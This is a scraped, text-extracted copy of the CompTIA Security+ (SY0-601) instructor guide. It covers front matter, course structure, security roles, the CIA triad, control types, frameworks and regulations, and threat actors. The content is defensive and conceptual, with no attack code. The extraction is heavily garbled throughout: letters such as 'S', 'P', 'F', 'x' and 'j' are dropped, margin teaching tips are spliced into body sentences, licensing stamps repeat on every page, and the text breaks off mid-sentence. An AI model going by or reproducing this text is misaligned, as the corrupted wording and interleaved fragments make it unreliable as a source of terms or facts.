Downloadable Official CompTIA Security+ Instructor Guide
Downloadable Official CompTIA Security+ Instructor Guide
CompTIA
Security+
Instructor Guide
(Exam SY0-601)
Course Edition: 1.0
Acknowledgments
Notices
Disclaimer
While CompTIA, Inc., takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity's products, or
another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain links
to sites on the Internet that are owned and operated by third parties (the "External Sites"). CompTIA is not responsible for
the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any concerns
regarding such links or External Sites.
Trademark Notice
CompTIA®, Security+®, and the CompTIA logo are registered trademarks of CompTIA, Inc., in the U.S. and other countries.
All other product and service names used may be common law or registered trademarks of their respective proprietors.
Copyright Notice
Copyright © 2020 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed
in any form or by any means, or stored in a database or retrieval system, without the prior written permission of CompTIA,
3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Table of Contents | iii
Table of Contents
Topic 1B: Compare and Contrast Security Control and Framework Types ..... 8
Topic 2A: Explain Threat Actor Types and Attack Vectors .............................. 18
Topic 3B: Explain Security Concerns with General Vulnerability Types ........ 50
Topic 5C: Summarize Cryptographic Use Cases and Weaknesses ................ 111
Table of Contents
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
iv | Table of Contents
Table of Contents
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Table of Contents | v
Topic 15A: Summarize Secure Cloud and Virtualization Services ................ 408
Lesson 16: Explaining Data Privacy and Protection Concepts ................................ 437
Topic 16B: Explain Privacy and Data Protection Controls ............................. 447
Topic 17B: Utilize Appropriate Data Sources for Incident Response ........... 465
Topic 18A: Explain Key Aspects of Digital Forensics Documentation .......... 484
Topic 18B: Explain Key Aspects of Digital Forensics Evidence Acquisition .... 490
Topic 19A: Explain Risk Management Processes and Concepts ................... 500
Table of Contents
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
vi | Table of Contents
Topic 21A: Explain the Importance of Physical Site Security Controls ........ 540
Topic 21B: Explain the Importance of Physical Host Security Controls....... 548
Glossary..........................................................................................................................G-1
Table of Contents
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
sin The Official om TI Security
Instructor Guide (Exam S
WELCOME TO THE INSTRUCTOR
The Official CompTIA Security+ Instructor and Student Guides (Exam SY0-601) have
been developed by CompTIA for the CompTIA certification candidate. igorously
evaluated by third party sub ect matter e perts to validate ade uate coverage of the
ecurity e am ob ectives, The Official CompTIA Security+ Instructor and Student Guides
teach students the knowledge and skills re uired to assess the security posture of
an enterprise environment and recommend and implement appropriate security
solutions monitor and secure hybrid environments, including cloud, mobile, and IoT
operate with an awareness of applicable laws and policies, including principles of
governance, risk, and compliance identify, analy e, and respond to security events and
incidents and prepare candidates to take the CompTIA ecurity certification e am.
The fficial CompTIA ecurity uides are created around several core principles
including
• Support the Modern Learner The fficial CompTIA ecurity uides are
designed with the modern student and classroom in mind, ensuring success
whether the course format is co located or remote, synchronous or asynchronous,
continuous or modular. Instructors will find best practices and recommendations
within the margin of their Instructor uide specific to the various course formats.
• Focused on Job Roles and Objectives fficial CompTIA uides are organi ed
into Courses, Lessons, and Topics that align training to work in the real world. At the
course level, the content re ects a real ob role, guided by the ob ectives and content
e amples in the CompTIA am b ectives document. Lessons refer to functional
areas within that ob role. Topics within each lesson relate to discrete ob tasks.
Preparing to Teach
The course covers the following themes
• Threat intelligence and security assessment Lessons .
In addition, incident response has been e panded and moved toward the end of the
course. In addition, physical site security is now covered at the end of the course.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
viii | Instructor Preface
• Reworked Presentation Tools: The number of ower oint lecture slides has been
vastly reduced as compared with , while supporting ower oint notes and
resentation lanners have been enhanced, making it easier for instructors to plan
lectures and use classroom time e ectively.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Instructor Preface | ix
CertMaster Labs
CertMaster Labs allow students to learn in actual software applications through a
remote lab environment. The labs align with The Official CompTIA Instructor and Student
Guides and allow students to practice what they are learning using real, hands on
e periences. All lab activities include gradable assessments, o er feedback and hints,
and provide a score based on learner inputs. tudents have access to the software
environment for months after they redeem their access key, providing a fantastic
resource for students to practice their skills. eatures of CertMaster Labs include
• Browser-based The labs can be accessed with a browser and internet connection,
making the setup process easy and enabling remote students to use the materials
without having to secure any special e uipment or software.
• Use Real Equipment and Software The labs use virtual machines configured
with actual software applications and operating systems allowing for e ibility in
approaching the lab tasks and replicating the e perience students will encounter in
a ob role.
• Graded Labs Lab activities will more accurately assess a student s ability to
perform tasks because they will get a score on their work and will surface that
information to instructors.
• Modular The labs within each course are independent of each other and can be
used in any order.
• Designed for Skills Development The labs help students gain e perience
with the practical tasks that will be e pected of them in a ob role and on the
performance based items found on CompTIA certification e ams.
• Ali ned ith cial CompTIA Content The labs are based on the content within
The fficial CompTIA Instructor and tudent uides, providing a consistent and
seamless e perience for students to both gain knowledge and practice skills
• Ability to Save Work tudents can save their work in labs for hours to allow
for more e ibility in how labs are implemented in coursework.
Lab Activities
ands on activities have been redesigned to take advantage of the virtual environment.
All lab activities include gradable assessments, o er feedback and hints, and provide a
score based on learner inputs. There are two types of labs
• Assisted Labs provide detailed steps with graded assessment and feedback for the
completion of each task. These labs are shorter, focus on a specific task and typically
take minutes to complete.
• Applied Labs are longer activities that provide a series of goal oriented scenarios
with graded assessment and feedback based on a learner s ability to complete each
goal successfully. Applied labs are typically minutes long and cover multiple
tasks a student has learned over the course of several lessons.
ind more information about CertMaster Labs and how to purchase them at
store.comptia.org.
Presentation Planners
ithin the instructional design hierarchy, the course structure tries to follow the
e am ob ectives domain structure as far as possible, but some ob ectives and content
e amples are split between multiple lessons and topics so as to make the topics ow
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
x | Instructor Preface
• Ask participants to preread some of the content as homework to reduce class time
spent on that topic.
• ummari e a topic in overview, and then answer uestions during a later session
when students have had a chance to study it in more detail.
• Consider a lab first approach to selected topics, referring students to the study
content for review later.
If students are struggling with lab activities, consider some of the following approaches
• Demonstrate a lab as a walkthrough.
• et students to partner up to complete a lab, with one student completing the steps
and the other student advising and checking.
• ummari e the remaining parts of a lab if students do not have time to finish in
class.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
About This Course
CompTIA is a not for profit trade association with the purpose of advancing the Teaching
interests of IT professionals and IT channel organi ations and its industry leading IT Tip
certifications are an important part of that mission. CompTIA's ecurity certification is Take some time at the
a foundation level certificate designed for IT administrators with two years' e perience start of the course for
whose ob role is focused on system security. students to introduce
themselves and
The CompTIA ecurity e am will certify the successful candidate has the knowledge identify the outcomes
and skills re uired to assist with cybersecurity duties in small and large organi ations. they hope to achieve
These duties include assessments and monitoring secure network, host, app, and by studying the
cloud provisioning data governance and incident analysis and response. course.
Course Description
Course Objectives
This course can benefit you in two ways. If you intend to pass the CompTIA ecurity
am certification e amination, this course can be a significant part of your
preparation. ut certification is not the only key to professional success in the field of
computer security. Today's ob market demands individuals with demonstrable skills,
and the information and activities in this course can help you build your cybersecurity
skill set so that you can confidently perform your duties in any entry level security role.
n course completion, you will be able to
• Compare security roles and security controls
• erform security assessments and identify social engineering attacks and malware
types
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
xii | Preface
Target Student
The Official CompTIA Security+ Guide (Exam SY0-601) is the primary course you will need
to take if your ob responsibilities include securing network services, devices, and data
confidentiality privacy in your organi ation. ou can take this course to prepare for the
CompTIA ecurity am certification e amination.
Prerequisites
• To ensure your success in this course, you should have basic indows and Linu
administrator skills and the ability to implement fundamental networking appliances
and I addressing concepts. CompTIA A and Network certifications, or e uivalent
knowledge, and si to nine months' e perience in networking, including configuring
security parameters, are strongly recommended.
The prere uisites for this course might differ significantly from the prere uisites for
the CompTIA certification exams. or the most up-to-date information about the exam
prere uisites, complete the form on this page comptia.org training resources exam-
ob ectives
As You Learn
At the top level, this course is divided into lessons, each representing an area of
competency within the target ob roles. ach lesson is composed of a number of topics.
A topic contains sub ects that are related to a discrete ob task, mapped to ob ectives
and content e amples in the CompTIA e am ob ectives document. ather than follow
the e am domains and ob ectives se uence, lessons and topics are arranged in order
of increasing proficiency. ach topic is intended to be studied within a short period
typically minutes at most . ach topic is concluded by one or more activities,
designed to help you to apply your understanding of the study notes to practical
scenarios and tasks.
Additional to the study content in the lessons, there is a glossary of the terms and
concepts used throughout the course. There is also an inde to assist in locating
particular terminology, concepts, technologies, and tasks within the lesson and topic
content.
In many electronic versions of the book, you can click links on key words in the topic content
to move to the associated glossary definition, and on page references in the index to move
to that term in the content. To return to the previous location in the document after clicking
a link, use the appropriate functionality in your e ook viewing software.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Preface | xiii
A Caution note makes you aware of places where you need to be par-
ticularly careful with your actions, settings, or decisions so that you can
be sure to get the desired results of an activity or task.
As You Review
Any method of instruction is only as e ective as the time and e ort you, the student,
are willing to invest in it. In addition, some of the information that you learn in class
may not be important to you immediately, but it may become important later. or this
reason, we encourage you to spend some time reviewing the content of the course
after your time in the classroom.
ollowing the lesson content, you will find a table mapping the lessons and topics to
the e am domains, ob ectives, and content e amples. ou can use this as a checklist as
you prepare to take the e am, and review any content that you are uncertain about.
As a Reference
The organi ation and layout of this book make it an easy to use resource for future
reference. uidelines can be used during class and as after class references when
you're back on the ob and need to refresh your understanding. Taking advantage of
the glossary, inde , and table of contents, you can use this book as a first source of
definitions, background information, and summaries.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 1
Comparing Security Roles and
Security Controls
Lesson Objectives
In this lesson, you will:
• Compare and contrast information security roles.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
2 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 1A
Compare and Contrast Information
Security Roles
Teaching EXAM OBJECTIVES COVERED
Tip This topic provides background information about the role of security professionals and
This topic introduces does not cover a specific exam ob ective.
the concept of
the CIA triad and
discusses roles and To be successful and credible as a security professional, you should understand
responsibilities in security in business starting from the ground up. ou should also know the key security
typical information terms and ideas used by other security e perts in technical documents and in trade
security teams. This
publications. ecurity implementations are constructed from fundamental building
topic does not align
to specific ob ectives, blocks, ust like a large building is constructed from individual bricks. This topic will help
but it does cover you understand those building blocks so that you can use them as the foundation for
some terminology your security career.
from the acronyms
list. ou can skip this
topic if students are Information Security
familiar with these
basic concepts and Information security (or infosec) refers to the protection of data resources from
terminology and you unauthori ed access, attack, theft, or damage. Data may be vulnerable because of
would prefer to move the way it is stored, the way it is transferred, or the way it is processed. The systems
uickly to covering used to store, transmit, and process data must demonstrate the properties of security.
syllabus content.
Secure information has three properties, often referred to as the CIA Triad
ho lide s • Confidentialit means that certain information should only be known to certain
people.
Information Security
• Integrity means that the data is stored and transferred as intended and that any
Teaching modification is authori ed.
Tip
• A aila ilit means that information is accessible to those authori ed to view or
Make sure that
students can
modify it.
di erentiate the
goals of providing
The triad can also be referred to as "AIC" to avoid confusion with the Central Intelligence
confidentiality,
integrity, and
Agency.
availability and non
repudiation). Note
that the property of
availability should not Some security models and researchers identify other properties that secure systems
be overlooked. should e hibit. The most important of these is non repudiation. Non-repudiation
An alternative means that a sub ect cannot deny doing something, such as creating, modifying, or
acronym is sending a resource. or e ample, a legal document, such as a will, must usually be
AIN rivacy, witnessed when it is signed. If there is a dispute about whether the document was
Authentication, correctly e ecuted, the witness can provide evidence that it was.
Integrity, Non
Repudiation). We will
discuss security versus
privacy later in the
course.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 3
ithin the goal of ensuring information security, cybersecurity refers specifically Cybersecurity
to provisioning secure processing hardware and software. Information security Framework
and cybersecurity tasks can be classified as five functions, following the framework
developed by the ational Institute o tandards and Technolo I T (nist.gov Teaching
cyberframework online learning five functions): Tip
Use these functions
• Identify develop security policies and capabilities. valuate risks, threats, and
to give students
vulnerabilities and recommend security controls to mitigate them. an overview of
typical cybersecurity
• rotect procure develop, install, operate, and decommission IT hardware and operations.
software assets with security as an embedded re uirement of every stage of this Make sure students
operations life cycle. are familiar with the
work of NIST. Note
• Detect perform ongoing, proactive monitoring to ensure that controls are e ective also that links in the
and capable of protecting against new types of threats. course will often
include sites and
• Respond—identify, analyze, contain, and eradicate threats to systems and data white papers with
security. considerable amounts
of additional detail.
• ecover implement cybersecurity resilience to restore systems and data if other This detail is not
controls are unable to prevent attacks. necessary to learn for
the exam.
tart to develop
the idea that
cybersecurity is
adversarial in nature,
with threat actors
continually seeking
new advantages over
defensive systems.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
4 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Monitor audit logs, review user privileges, and document access controls.
• Create and test business continuity and disaster recovery plans and procedures.
owever, the goals of a network manager are not always well aligned with the
goals of security network management focuses on availability over confidentiality.
Conse uently, security is increasingly thought of as a dedicated function or business
unit with its own management structure.
• Managers may have responsibility for a domain, such as building control, ICT, or
accounting.
• Technical and specialist sta have responsibility for implementing, maintaining, and
monitoring the policy. ecurity might be made a core competency of systems and
network administrators, or there may be dedicated security administrators. ne
such ob title is In ormation stems ecurit cer I .
• Non technical sta have the responsibility of complying with policy and with any
relevant legislation.
• ternal responsibility for security due care or liability lies mainly with directors
or owners, though again it is important to note that all employees share some
measure of responsibility.
IST s ational Initiative for Cybersecurity Education ( ICE) categorizes ob tasks and ob
roles within the cybersecurity industry (gov itl applied-cybersecurity nice nice-framework-
resource-center).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 5
The following units are ofen used to represent the security function within the Information Security
organizational hierarchy. usiness nits
Interaction
Opportunity
If appropriate,
discuss how the
security function is
represented in the
students' workplaces.
Do any students
currently work in a
SOC or participate in
Dev ec ps pro ects
DevSecOps
Network operations and use of cloud computing make ever increasing use of
automation through software code. Traditionally, software code would be the
responsibility of a programming or development team. eparate development and
operations departments or teams can lead to silos, where each team does not work
e ectively with the other.
e elopment and operations e ps is a cultural shift within an organization to
encourage much more collaboration between developers and system administrators.
y creating a highly orchestrated environment, IT personnel and developers can build,
test, and release software faster and more reliably. Many consider a Dev ps approach
to administration as the only way organi ations can take full advantage of the potential
benefits o ered by cloud service providers.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
6 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Incident Response
A dedicated c er incident response team CI T computer security incident
response team C I T computer emergency response team C T as a single point of
contact for the notification of security incidents. This function might be handled by the
C or it might be established as an independent business unit.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 7
Review Activity:
Information Security Roles
Teaching
Answer the following questions:
Tip
ou can either
complete the review
questions in class with
1. What are the properties of a secure information processing system? the students or simply
make them aware of
Confidentiality, Integrity, and Availability and Non repudiation . them as resources to
use as they review the
2. What term is used to describe the property of a secure network where a course material before
sender cannot deny having sent a message? the exam.
Non repudiation.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
8 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 1B
Compare and Contrast Security Control
and Framework Types
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 9
Although it uses a more complex scheme, it is worth being aware of the way the ational
Institute of Standards and Technology ( IST) classifies security controls (nvlpubs.nist.gov
nistpubs SpecialPublications IST.SP. 00- r .pdf). ho lide s
Security Control
Functional Types (2)
ecurit Control unctional T pes
ecurity controls can also be classified in types according to the goal or function they Teaching
perform: Tip
Where the category
• reventive the control acts to eliminate or reduce the likelihood that an attack can describes the
succeed. A preventative control operates before an attack can take place. Access implementation type,
control lists AC configured on firewalls and file system ob ects are preventative a functional type
type controls. Anti malware software also acts as a preventative control, by blocking describes what the
control is deployed
processes identified as malicious from e ecuting. Directives and standard operating
to do.
procedures s can be thought of as administrative versions of preventative
controls. Interaction
Opportunity
• Detective the control may not prevent or deter access, but it will identify and
record any attempted or successful intrusion. A detective control operates during Get the students to
nominate examples
the progress of an attack. Logs provide one of the best e amples of detective type of di erent types of
controls. controls:
• reventive
• Corrective—the control acts to eliminate or reduce the impact of an intrusion
permissions policy,
event. A corrective control is used after an attack. A good e ample is a backup encryption, firewall,
system that can restore data that was damaged during an intrusion. Another barriers, locks
e ample is a patch management system that acts to eliminate the vulnerability • Detective alarms,
exploited during the attack. monitoring, file
verification
hile most controls can be classed functionally as preventative, detective, or • Corrective incident
corrective, a few other types can be used to define other cases response policies,
data backup, patch
• h sical—Controls such as alarms, gateways, locks, lighting, security cameras, and management
guards that deter and detect access to premises and hardware are often classed
separately.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
10 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Deterrent The control may not physically or logically prevent access, but
psychologically discourages an attacker from attempting an intrusion. This could
include signs and warnings of legal penalties against trespass or intrusion.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 11
NI T's isk Management ramework M pre dates the C . here the C focuses
on practical cybersecurity for businesses, the M is more prescriptive and principally
intended for use by federal agencies csrc.nist.gov pro ects risk management rmf
overview).
As well as its cybersecurity and risk frameworks, NI T is responsible for issuing the
ederal Information rocessing tandards I plus advisory guides called pecial
ublications csrc.nist.gov publications sp). Many of the standards and technologies
covered in CompTIA ecurity are discussed in these documents.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
12 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
AIC A . These audits are designed to assure consumers that service providers
notably cloud providers, but including any type of hosted or third party service
meet professional standards (aicpa.org interestareas frc assuranceadvisoryservices
serviceorgani ation smanagement.html . ithin A No. the current specification ,
there are several levels of reporting
• ervice rgani ation Control C evaluates the internal controls implemented
by the service provider to ensure compliance with Trust ervices Criteria T C when
storing and processing customer data. T C refers to security, confidentiality, integrity,
availability, and privacy properties. An C Type I report assesses the system design,
while a Type II report assesses the ongoing e ectiveness of the security architecture
over a period of months. C reports are highly detailed and designed to
be restricted. They should only be shared with the auditor and regulators and with
important partners under non disclosure agreement (NDA) terms.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 13
Application er ers
Most application architectures use a client server model. This means that part of the
application is a client software program, installed and run on separate hardware to
the server application code. The client interacts with the server over a network. Attacks
can therefore be directed at the local client code, at the server application, or at the
network channel between them. As well as coding issues, the applications need to take
account of platform issues. The client application might be running in a computing host
alongside other, potentially malicious, software. Code that runs on the client should
not be trusted. The server side code should implement routines to verify that input
conforms to what is expected.
e er er Applications
A web application is a particular type of client server architecture. A web application
leverages e isting technologies to simplify development. The application uses a generic
client a web browser , and standard network protocols and servers TT TT . The
specific features of the application are developed using code running on the clients
and servers. eb applications are also likely to use a multi tier architecture, where the
server part is split between application logic and data storage and retrieval. Modern
web applications may use even more distributed architectures, such as microservices
and serverless.
The pen e Application ecurit ro ect A is a not for profit, online
community that publishes several secure application development resources, such as
the Top list of the most critical application security risks owasp.org www pro ect
top ten . A has also developed resources, such as the ed Attack ro y and Juice
hop a deliberately unsecure web application , to help investigate and understand
penetration testing and application security issues.
The key frameworks, benchmarks, and configuration guides may be used to Regulations,
demonstrate compliance with a country's legal regulatory re uirements or with Standards, and
industry specific regulations. Due diligence is a legal term meaning that responsible Legislation
persons have not been negligent in discharging their duties. Negligence may create
criminal and civil liabilities. Many countries have enacted legislation that criminali es Teaching
negligence in information management. In the US, for example, the ar anes le Tip
Act mandates the implementation of risk assessments, internal controls, and The syllabus does not
audit procedures. The Computer ecurity Act re uires federal agencies to list specific e amples
develop security policies for computer systems that process confidential information. of legislation, so these
are illustrative rather
In , the ederal Information ecurity Management Act I MA was introduced to
than comprehensive.
govern the security of data processed by federal government agencies. Students should focus
on the fact that there
Some regulations have specific cybersecurity control re uirements others simply mandate can be many di erent
best practice, as represented by a particular industry or international framework. It may sources of compliance
be necessary to perform mapping between different industry frameworks, such as IST requirements.
and ISO , if a regulator specifies the use of one but not another. Conversely, the use of Note the di erence
frameworks may not be mandated as such, but auditors are likely to expect them to be in between vertical
place as a demonstration of a strong and competent security program. sector specific and
hori ontal consumer
specific, cross sector
ersonal ata and the eneral ata rotection e ulation legislation.
here some types of legislation address cybersecurity due diligence, others focus in
whole or in part on information security as it a ects privacy or personal data. rivacy
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
14 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
is a distinct concept from security. rivacy re uires that collection and processing
of personal information be both secure and fair. airness and the right to privacy,
as enacted by regulations such as the uropean nion's eneral ata rotection
e ulation , means that personal data cannot be collected, processed, or
retained without the individual's informed consent. Informed consent means that the
data must be collected and processed only for the stated purpose, and that purpose
must be clearly described to the user in plain language, not legalese. D ico.org.
uk for organisations guide to data protection guide to the general data protection
regulation gdpr gives data sub ects rights to withdraw consent, and to inspect, amend,
or erase data held about them.
aronis blog contains a useful overview of privacy laws in the US (varonis.com blog us-
privacy-laws).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 15
Review Activity:
Security Control and Framework Types
Answer the following questions:
2. A compan has installed motion acti ated oodli htin on the rounds
around its premises hat class and unction is this securit control
It would be classed as a physical control and its function is both detecting and
deterring.
That the control is enforced by a a person rather than a technical system, and that
the control has been developed to replicate the functionality of a primary control, as
re uired by a security standard.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
16 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 1
Summary
Teaching ou should be able to compare and contrast security controls using categories and
Tip functional types. ou should also be able to e plain how regulations, frameworks, and
Check that students
benchmarks are used to develop and validate security policies and control selection.
are confident about
the content that has
been covered. If there
uidelines or Comparin ecurit oles and
is time, revisit any ecurit Controls
content examples that
they have uestions Follow these guidelines when you assess the use of security controls, frameworks, and
about. If you have benchmarks in your organi ation
used all the available
time for this lesson • Create a security mission statement and supporting policies that emphasizes the
block, note the issues, importance of the CIA triad confidentiality, integrity, availability.
and schedule time for
a review later in the • Assign roles so that security tasks and responsibilities are clearly understood and
course. that impacts to security are assessed and mitigated across the organization.
Interaction
• Consider creating business units, departments, or pro ects to support the security
Opportunity
function, such as a C, C I T, and Dev ec ps.
Optionally, discuss
with students how • Identify and assess the laws and industry regulations that impose compliance
the concepts from re uirements on your business.
this lesson could be
used within their own • elect a framework that meets compliance re uirements and business needs.
workplaces, or how
these principles are • Create a matrix of security controls that are currently in place to identify categories
already being put into
and functions—consider deploying additional controls for any unmatched
practice.
capabilities.
• valuate security capabilities against framework tiers and identify goals for
developing additional cybersecurity competencies and improving overall
information security assurance.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 2
Explaining Threat Actors and
Threat Intelligence
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
18 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 2A
Explain Threat Actor Types and
Attack Vectors
• Risk is the likelihood and impact or conse uence of a threat actor e ploiting
a vulnerability. To assess risk, you identify a vulnerability and then evaluate the
likelihood of it being e ploited by a threat and the impact that a successful e ploit
would have.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 19
These definitions and more information on risk management are contained in IST s SP
00- 0 (nvlpubs.nist.gov nistpubs egacy SP nistspecialpublication 00- 0r1.pdf).
istorically, cybersecurity techni ues were highly dependent on the identification Attributes of Threat
of static known threats, such as viruses or rootkits, Tro ans, botnets, and specific Actors
software vulnerabilities. It is relatively straightforward to identify and scan for these
types of threats with automated software. nfortunately, adversaries were able to Teaching
develop means of circumventing this type of signature based scanning. Tip
Note that the detailed
The sophisticated nature of modern cybersecurity threats means that it is important
process of analy ing
to be able to describe and analy e behaviors. This analysis involves identifying the the threat posed by
attributes of threat actors in terms of location, intent, and capability. a particular actor or
adversary group is
Internal/External described as threat
modeling. Discuss
An e ternal threat actor or agent is one that has no account or authori ed access how threat sources
to the target system. A malicious e ternal threat must infiltrate the security system and motivations
using malware and or social engineering. Note that an e ternal actor may perpetrate change over time.
or e ample,
an attack remotely or on premises by breaking into the company's head uarters, Internet threats have
for instance . It is the threat actor that is defined as e ternal, rather than the changed from being
attack method. mostly opportunistic
vandalism to
Conversely, an internal or insider threat actor is one that has been granted structured threats
permissions on the system. This typically means an employee, but insider threat can associated with
also arise from contractors and business partners. organi ed crime and
state backed groups.
Intent/Motivation
Intent describes what an attacker hopes to achieve from the attack, while motivation
is the attacker's reason for perpetrating the attack. A malicious threat actor could
be motivated by greed, curiosity, or some sort of grievance, for instance. The intent
could be to vandali e and disrupt a system or to steal something. Threats can be
characteri ed as structured or unstructured or targeted versus opportunistic
depending on the degree to which your own organi ation is targeted specifically. or
e ample, a criminal gang attempting to steal customers' financial data is a structured,
targeted threat a script kiddie launching some variant on the I Love ou email worm
is an unstructured, opportunistic threat.
Malicious intents and motivations can be contrasted with accidental or unintentional
threat actors and agents. nintentional threat actors represents accidents, oversights,
and other mistakes.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
20 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Script Kiddies
Show Slide(s)
A script kiddie is someone who uses hacker tools without necessarily understanding
tate Actors and
how they work or having the ability to craft new attacks. cript kiddie attacks might
Advanced ersistent have no specific target or any reasonable goal other than gaining attention or proving
Threats technical abilities.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 21
Show Slide(s)
Criminal yndicates
and Competitors
Teaching
Tip
IM swap fraud is a
good illustration of
organi ed crime type
activity digitaltrends.
esearchers such as ireEye report on the activities of organized crime and nation state actors. com mobile sim swap
(Screenshot used with permission from fireeye.com.) fraud e plained .
The armin
tate actors will work at arm's length from the national government, military, or ransomware incident
illustrates the blurred
security service that sponsors and protects them, maintaining plausible deniability.
lines between
They are likely to pose as independent groups or even as hacktivists. They may wage criminal syndicates,
false ag campaigns that try to implicate other states media.kasperskycontenthub. state groups, and
com wp content uploads sites A T predictions intent motivation
web.pdf . dnet.com article
hacker gang behind
garmin attack doesnt
Criminal Syndicates and Competitors have a history of
stealing user data .
In many countries, cybercrime has overtaken physical crime both in terms of number
of incidents and losses. A criminal syndicate can operate across the Internet from
di erent urisdictions than its victim, increasing the comple ity of prosecution. Show Slide(s)
yndicates will seek any opportunity for criminal profit, but typical activities are
financial fraud both against individuals and companies and e tortion. Insider Threat Actors
Most competitor driven espionage is thought to be pursued by state actors, but it is not Teaching
inconceivable that a rogue business might use cyber espionage against its competitors. Tip
uch attacks could aim at theft or at disrupting a competitor's business or damaging The Capital ne
their reputation. Competitor attacks might be facilitated by employees who have scmaga ine.com
recently changed companies and bring an element of insider knowledge with them. home security news
capital one breach
e poses not ust data
Insider Threat Actors but dangers of cloud
misconfigurations
Many threat actors operate e ternally from the networks they target. An e ternal actor and Twitter vice.com
has to break into the system without having been granted any legitimate permissions. en us article g d d
An insider threat arises from an actor who has been identified by the organi ation and twitter insider access
granted some sort of access. ithin this group of internal threats, you can distinguish panel account hacks
biden uber be os
insiders with permanent privileges, such as employees, from insiders with temporary
breaches are good
privileges, such as contractors and guests. The Computer mergency esponse Team e amples of insider
C T at Carnegie Mellon niversity's definition of a malicious insider is threat.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
22 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
There is the blurred case of former insiders, such as ex-employees now working at another
company or who have been dismissed and now harbor a grievance. These can be classified
as internal threats or treated as external threats with insider knowledge, and possibly some
residual permissions, if effective offboarding controls are not in place.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 23
• mail the attacker sends a malicious file attachment via email, or via any other
communications system that allows attachments. The attacker needs to use social
